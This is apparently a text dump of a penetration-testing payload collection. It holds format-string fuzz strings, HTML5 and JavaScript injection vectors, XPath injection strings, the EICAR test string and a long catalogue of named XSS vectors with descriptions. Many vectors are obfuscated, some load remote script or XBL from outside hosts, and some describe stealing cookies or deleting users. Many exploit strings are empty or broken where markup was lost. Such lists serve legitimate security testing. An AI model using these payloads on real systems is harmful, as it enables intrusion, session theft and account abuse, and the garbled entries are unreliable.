you can use in your PoCs. This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either. Examples: Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);} IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); ## POC_img_phpinfo File Outlined here: https://www.secgeek.net/bookfresh-vulnerability/ ================================================ FILE: attack/file-upload/malicious-images/eicar.com.txt ================================================ X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* ================================================ FILE: attack/format-strings/format-strings.txt ================================================ %s%p%x%d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %20d %20n %20x %20s %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s| AAAAA%c AAAAA%d AAAAA%e AAAAA%f AAAAA%I AAAAA%o AAAAA%p AAAAA%s AAAAA%x AAAAA%n ppppp%c ppppp%d ppppp%e ppppp%f ppppp%I ppppp%o ppppp%p ppppp%s ppppp%x ppppp%n %@ %@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@%@ %* %*p %*x %*s %*S %*$* %*$*p %*$*x %*$*s %*$*S ================================================ FILE: attack/html_js_fuzz/HTML5sec_Injections.txt ================================================

&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi &alert&A7&(1)&R&UA;&&<&A9&11/script&X&> 0? :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk')) X





...



01 X ¼script ¾alert(1)//¼/script ¾
1 ;1 +ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input); 1 @import "data:,*%7bx:expression(write(1))%7D";
XXXXXX 1 1 XXX ><image xlink:href="
  • XXX Hello X
    XXX
    XXX
    " "]]>" "" $ % 'XoiZR <% Tnn96 %> <%= Tnn96 %> <? Tnn96 ?> <?Tnn96 ?> <Tnn96> "XoiZR (Tnn96) * */* / // //* : ; @ @* [Tnn96] ]> {{= Tnn96}} {{Tnn96}} {= Tnn96} {Tnn96} + SCRIPT]]>alert('XSS');/SCRIPT]]> var n=0;while(true){n++;}]]> ]>&xee; ]>&xee; ]>&xee; ]>&xee; SCRIPT]]>alert('gotcha');/SCRIPT]]> ','')); phpinfo(); exit;/* 0 0.00005 0.1 0.9 1 -1 1.7976931348623157e+308 5e-10 5e-324 count(/child::node()) false null true x' or 1=1 or 'x'='y x' or name()='username' or 'x'='y ================================================ FILE: attack/xpath/README.md ================================================ tool: http://code.google.com/p/xpath-blind-explorer/ video: http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/ ================================================ FILE: attack/xpath/xpath-injection.txt ================================================ ' or '1'='1 ' or ''=' x' or 1=1 or 'x'='y / // //* */* @* count(/child::node()) x' or name()='username' or 'x'='y ' and count(/*)=1 and '1'='1 ' and count(/@*)=1 and '1'='1 ' and count(/comment())=1 and '1'='1 ================================================ FILE: attack/xss/JHADDIX_XSS_WITH_CONTEXT.doc.txt ================================================ A very short cross browser header injection Exploit Name: A very short cross browser header injection Exploit String: with(document)getElementsByTagName('head')[0].appendChild(createElement('script')).src='//ŋ.ws' Exploit Description: This vector shows one of the shortest possible ways to inject external JavaScript into a website's header area. Exploit Tags: xss, short, header, injection Author Name: .mario Add onclick event hadler Exploit Name: Add onclick event hadler Exploit String: onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); Exploit Description: This vector adds an onclick event handler to a tag and appends an obfuscated JS alert. Exploit Tags: general, JS breaking, basic, obfuscated, user interaction Author Name: kishor Advanced HTML injection locator Exploit Name: Advanced HTML injection locator Exploit String: 000%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e<s>333</s><s>444</s> Exploit Description: This vector indicates HTML injections by stroked text. Exploit Tags: general, html breaking, injection Author Name: .mario Advanced XSS Locator Exploit Name: Advanced XSS Locator Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");}alert(6);function xss(){// Exploit Description: Advanced XSS Locator Exploit Tags: general, html breaking, comment breaking, JS breaking Author Name: .mario Advanced XSS Locator for title-Injections Exploit Name: Advanced XSS Locator for title-Injections Exploit String: ';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//-->">'>=&{}");} Exploit Description: This is a modified version of the XSS Locator from ha.ckers.org especially crafted to check for title injections. Exploit Tags: general, html breaking, comment breaking, JS breaking, title breaking Author Name: .mario aim: uri exploit Exploit Name: aim: uri exploit Exploit String: aim: &c:\windows\system32\calc.exe" ini="C:\Documents and Settings\All Users\Start Menu\Programs\Startup\pwnd.bat" Exploit Description: This aim-uri executes the calc.exe on vulnerable systems Exploit Tags: URI exploits, gecko, injection, general Author Name: xs-sniper Backslash-obfuscated XBL injection - variant 1 Exploit Name: Backslash-obfuscated XBL injection - variant 1 Exploit String:
    Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 2 Exploit Name: Backslash-obfuscated XBL injection - variant 2 Exploit String:
    Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. All important characters are obfuscated by unclosed entities. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 3 Exploit Name: Backslash-obfuscated XBL injection - variant 3 Exploit String: Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. As we can see gecko based browsers accept various characters as valid tags. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 4 Exploit Name: Backslash-obfuscated XBL injection - variant 4 Exploit String: Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Furthermore unclosed NBSP entities are used to obfuscate the string. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk Backslash-obfuscated XBL injection - variant 5 Exploit Name: Backslash-obfuscated XBL injection - variant 5 Exploit String: Exploit Description: This vector utilizes backslashes to exploit a parsing error in gecko based browsers and injects a remote XBL. Between any character of the original payload null bytes are used to obfuscate. Exploit Tags: general, injection, gecko, style injection, XBL, obfuscated Author Name: thespanner.co.uk BASE Exploit Name: BASE Exploit String: Exploit Description: Works in IE and Netscape 8.1 in safe mode. You need the // to comment out the next characters so you won't get a JavaScript error and your XSS tag will render. Also, this relies on the fact that the website uses dynamically placed images like ”images/image.jpg” rather than full paths. If the path includes a leading forward slash like ”/images/image.jpg” you can remove one slash from this vector (as long as there are two to begin the comment this will work Exploit Tags: general, evil tags Author Name: ha.ckers.org Basic back ticked attribute breaker Exploit Name: Basic back ticked attribute breaker Exploit String: `> Exploit Description: This vector breaks back ticked attributes. Exploit Tags: general, html breaking, basic Author Name: kishor Basic double quoted attribute breaker Exploit Name: Basic double quoted attribute breaker Exploit String: > Exploit Description: This vector breaks double quoted attributes and produces an alert. Exploit Tags: general, html breaking Author Name: kishor Basic JS breaker Exploit Name: Basic JS breaker Exploit String: xyz onerror=alert(6); Exploit Description: This vector just fits between script tags and fires an alerts. Exploit Tags: general, JS breaking, basic Author Name: kishor Basic JS breaker variant 1 Exploit Name: Basic JS breaker variant 1 Exploit String: 1;a=eval;b=alert;a(b(/c/.source)); Exploit Description: This vector breaks JS integer assignments. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 2 Exploit Name: Basic JS breaker variant 2 Exploit String: 1];a=eval;b=alert;a(b(17));// Exploit Description: This vector breaks JS integer assignments in arrays. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 3 Exploit Name: Basic JS breaker variant 3 Exploit String: ];a=eval;b=alert;a(b(16));// Exploit Description: This vector breaks JS when placed in double quoted arrays. Exploit Tags: general, JS breaking Author Name: kishor Basic JS breaker variant 4 Exploit Name: Basic JS breaker variant 4 Exploit String: '];a=eval;b=alert;a(b(15));// Exploit Description: This vector breaks JS when embedded in single quoted arrays. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 5 Exploit Name: Basic JS breaker variant 5 Exploit String: 1};a=eval;b=alert;a(b(14));// Exploit Description: JS literal object breaker for integer properties. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 6 Exploit Name: Basic JS breaker variant 6 Exploit String: '};a=eval;b=alert;a(b(13));// Exploit Description: JS breaker for literal objects with single quoted string properties. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 7 Exploit Name: Basic JS breaker variant 7 Exploit String: };a=eval;b=alert;a(b(12));// Exploit Description: JS breaker for literal objects with double quoted string properties. Exploit Tags: general, JS breaking Author Name: kishor Basic JS breaker variant 8 Exploit Name: Basic JS breaker variant 8 Exploit String: a=1;a=eval;b=alert;a(b(11));// Exploit Description: Can be used when JS can be injected directly. Exploit Tags: general, JS breaking, basic, obfuscated Author Name: kishor Basic JS breaker variant 9 Exploit Name: Basic JS breaker variant 9 Exploit String: ;//%0da=eval;b=alert;a(b(10));// Exploit Description: Breaks double quoted strings, injects a comment, carriage return and finally an alert. Exploit Tags: general, JS breaking, CRLF Author Name: kishor Basic JS breaker variant 10 Exploit Name: Basic JS breaker variant 10 Exploit String: ';//%0da=eval;b=alert;a(b(9));// Exploit Description: Breaks single quoted strings, injects a comment, carriage return and finally an alert. Exploit Tags: general, JS breaking, basic, obfuscated, CRLF Author Name: kishor Basic single quoted attribute breaker Exploit Name: Basic single quoted attribute breaker Exploit String: '> Exploit Description: This vector breaks single quoted attributes and appends an alert. Exploit Tags: general, html breaking, basic Author Name: kishor Basic title breaker Exploit Name: Basic title breaker Exploit String: Exploit Description: This basic vector breaks HTML titles and injects JavaScript. Exploit Tags: general, html breaking, basic, title breaking Author Name: kishor BGSOUND Exploit Name: BGSOUND Exploit String: Exploit Description: BGSOUND Exploit Tags: general, evil tags Author Name: ha.ckers.org BODY background-image Exploit Name: BODY background-image Exploit String: Exploit Description: BODY image Exploit Tags: general, evil tags Author Name: ha.ckers.org BODY ONLOAD Exploit Name: BODY ONLOAD Exploit String: Exploit Description: BODY tag (I like this method because it doesn't require using any variants of ”javascript:” or ” Exploit Description: For some reason, Firefox picks up the script closing tag in the quoted string and then proceeds to process the remaining script tags as code. Exploit Tags: general, gecko, obfuscated, evil tags Author Name: t3rmin4t0r Commented-out Block Exploit Name: Commented-out Block Exploit String: Exploit Description: Downlevel-Hidden block (only works in IE5.0 and later and Netscape 8.1 in IE rendering engine mode). Some websites consider anything inside a comment block to be safe and therefore it does not need to be removed, which allows our XSS vector. Or the system could add comment tags around something to attempt to render it harmless. As we can see, that probably wouldn't do the job. Exploit Tags: general, obfuscated, conditional comments, internet explorer Author Name: ha.ckers.org Comment-breaker using obfuscated JavaScript Exploit Name: Comment-breaker using obfuscated JavaScript Exploit String: */a=eval;b=alert;a(b(/e/.source));/* Exploit Description: This vector creates an alert by breaking multiline comments. Exploit Tags: general, comment breaking, JS breaking Author Name: kishor Conditional style injection for IE Exploit Name: Conditional style injection for IE Exploit String: width: expression((window.r==document.cookie)?'':alert(r=document.cookie)) Exploit Description: This vector uses JavaScript conditional statements to inject an alert into CSS properties - it was once used as a PoC for a vulnerability in Stefan Di Paolos data binding example. Exploit Tags: general, obfuscated, internet explorer, style injection Author Name: DoctorDan Content Replace Exploit Name: Content Replace Exploit String: XSS Exploit Description: Content replace as an attack vector (assuming ”http://www.google.com/” is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (”java&#x09;script:” was converted into ”java script:”. Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org Cookie Manipulation Exploit Name: Cookie Manipulation Exploit String: Exploit Description: Cookie manipulation - admittedly this is pretty obscure but I have seen a few examples where Exploit Description: Div background-image Exploit Tags: general, evil tags, style injection Author Name: ha.ckers.org DIV background-image 2 Exploit Name: DIV background-image 2 Exploit String:
    Exploit Description: Div background-image plus extra characters. I built a quick XSS fuzzer to detect any erroneous characters that are allowed after the open parenthesis but before the JavaScript directive in IE and Netscape 8.1 in secure site mode. These are in decimal but you can include hex and add padding of course. (Any of the following chars can be used: 1-32, 34, 39, 160, 8192-8203, 12288, 65279) Exploit Tags: general, evil tags, style injection Author Name: ha.ckers.org DIV expression Exploit Name: DIV expression Exploit String:
    Exploit Description: Div expression - a variant of this was effective against a real world cross site scripting filter using a newline between the colon and ”expression” Exploit Tags: general, evil tags, style injection, internet explorer Author Name: ha.ckers.org DIV w/Unicode Exploit Name: DIV w/Unicode Exploit String:
    Exploit Description: DIV background-image with unicoded XSS exploit (this has been modified slightly to obfuscate the url parameter). The original vulnerability was found by Renaud Lifchitz (http://www.sysdream.com) as a vulnerability in Hotmail. Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org Double open angle brackets Exploit Name: Double open angle brackets Exploit String: Exploit Description: Iframe (If iframes are allowed there are a lot of other XSS problems as well). Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org Image onerror wrapped in XML statement Exploit Name: Image onerror wrapped in XML statement Exploit String: a= %3c%69%6d%67%2f%73%72%63%3d%31 %20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e document.write(unescape(a..b)) Exploit Description: This vector writes an erroneous image tag with onerror hanlder inside an E4X construct into the document context. Exploit Tags: general, obfuscated, gecko, XML predicates, evil tags Author Name: .mario Image tag with obfuscated JS URI Exploit Name: Image tag with obfuscated JS URI Exploit String: Exploit Description: This vector creates three image tags with differing CRLF obfuscation in the javascript: URI. Exploit Tags: general, basic, obfuscated, evil tags, internet explorer Author Name: OWASP Image w/CharCode Exploit Name: Image w/CharCode Exploit String: Exploit Description: If no quotes of any kind are allowed you can eval() a fromCharCode in JavaScript to create any XSS vector you need. Exploit Tags: general, evil tags, obfuscated, internet explorer Author Name: ha.ckers.org IMG Dynsrc Exploit Name: IMG Dynsrc Exploit String: Exploit Description: IMG Dynsrc Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG Embedded commands 1 Exploit Name: IMG Embedded commands 1 Exploit String: Exploit Description: This works when the webpage where this is injected (like a web-board) is behind password protection and that password protection works with other commands on the same domain. This can be used to delete users, add users (if the user who visits the page is an administrator), send credentials elsewhere, etc... This is one of the lesser used but more useful XSS vectors. Exploit Tags: general, evil tags Author Name: ha.ckers.org IMG Embedded commands 2 Exploit Name: IMG Embedded commands 2 Exploit String: Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser Exploit Description: IMG Embedded commands part II - this is more scary because there are absolutely no identifiers that make it look suspicious other than it is not hosted on your own domain. The vector uses a 302 or 304 (others work too) to redirect the image back to a command. So a normal could actually be an attack vector to run commands as the user who views the image link. Here is the .htaccess (under Apache) line to accomplish the vector (thanks to Timo for part of this). Exploit Tags: general, redirect Author Name: ha.ckers.org IMG Lowsrc Exploit Name: IMG Lowsrc Exploit String: Exploit Description: IMG Lowsrc Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG No Quotes/Semicolon Exploit Name: IMG No Quotes/Semicolon Exploit String: Exploit Description: No quotes and no semicolon Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG STYLE w/expression Exploit Name: IMG STYLE w/expression Exploit String: exp/* Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop). Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG w/JavaScript Directive Exploit Name: IMG w/JavaScript Directive Exploit String: Exploit Description: Image XSS using the JavaScript directive. Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IMG w/VBscript Exploit Name: IMG w/VBscript Exploit String: Exploit Description: VBscript in an image Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org INPUT Image Exploit Name: INPUT Image Exploit String: Exploit Description: INPUT Image Exploit Tags: general, evil tags, internet explorer Author Name: ha.ckers.org IP Encoding Exploit Name: IP Encoding Exploit String: XSS Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed). Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org JavaScript concatenation vector variant 1 Exploit Name: JavaScript concatenation vector variant 1 Exploit String: s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 Exploit Description: This vector concatenates a string and evaluates it via mapping on URL Exploit Tags: general, internet explorer, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 2 Exploit Name: JavaScript concatenation vector variant 2 Exploit String: s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; Exploit Description: This vector concatenates a string and evaluates it via self-execution. Exploit Tags: general, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 3 Exploit Name: JavaScript concatenation vector variant 3 Exploit String: s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); Exploit Description: This vector concatenates a string and evaluates it via usage of common DOM methods and element creation. Exploit Tags: general, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 4 Exploit Name: JavaScript concatenation vector variant 4 Exploit String: s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 5 Exploit Name: JavaScript concatenation vector variant 5 Exploit String: s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a JSON array. Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 6 Exploit Name: JavaScript concatenation vector variant 6 Exploit String: s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; Exploit Description: This vector concatenates a string and evaluates it via filling the URL property with payload concatenated in a string via ternary operators. Exploit Tags: general, internet explorer, concatenated, obfuscated Author Name: PHPIDS Group JavaScript concatenation vector variant 7 Exploit Name: JavaScript concatenation vector variant 7 Exploit String: s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; Exploit Description: This vector concatenates a string and evaluates it via filling a variable with payload concatenated in a regular string via ternary operators. Exploit Tags: general, JSON, concatenated, obfuscated Author Name: PHPIDS Group JavaScript Includes Exploit Name: JavaScript Includes Exploit String:
    Exploit Description: &JavaScript includes (works in Netscape 4.x). Exploit Tags: general, evil tags, obfuscated Author Name: ha.ckers.org JavaScript Link Location Exploit Name: JavaScript Link Location Exploit String: XSS Exploit Description: URL string evasion (assuming ”http://www.google.com/” is programmatically disallowed) JavaScript link location Exploit Tags: general, evil tags, obfuscated, redirect Author Name: ha.ckers.org JavaScript-breaker using carriage return Exploit Name: JavaScript-breaker using carriage return Exploit String: %0da=eval;b=alert;a(b(/d/.source)); Exploit Description: This vector uses an urlencoded carriage return to break JS code and produce an alert afterwards. Exploit Tags: general, JS breaking, CRLF Author Name: kishor JS link with whitespace obfuscation Exploit Name: JS link with whitespace obfuscation Exploit String: test Exploit Description: This vector utilizes whitespace to obfuscate and contains a JS link. Exploit Tags: general, evil tags, obfuscated Author Name: thespanner.co.uk JS string concatenation breaker Exploit Name: JS string concatenation breaker Exploit String: +alert(0)+ Exploit Description: This can be used when input is concatenated in JavaScript. Exploit Tags: general, JS breaking, basic Author Name: .mario JSON based obfuscated onload vector Exploit Name: JSON based obfuscated onload vector Exploit String: Exploit Description: This vector injects a new body tag and utilized the onload event to modify the DOM Exploit Tags: general, evil tags, JSON, obfuscated Author Name: thespanner.co.uk JSON based semicolon-onload vector Exploit Name: JSON based semicolon-onload vector Exploit String: Exploit Description: Layer (Older Netscape only) Exploit Tags: general, evil tags Author Name: ha.ckers.org List-style-image Exploit Name: List-style-image Exploit String: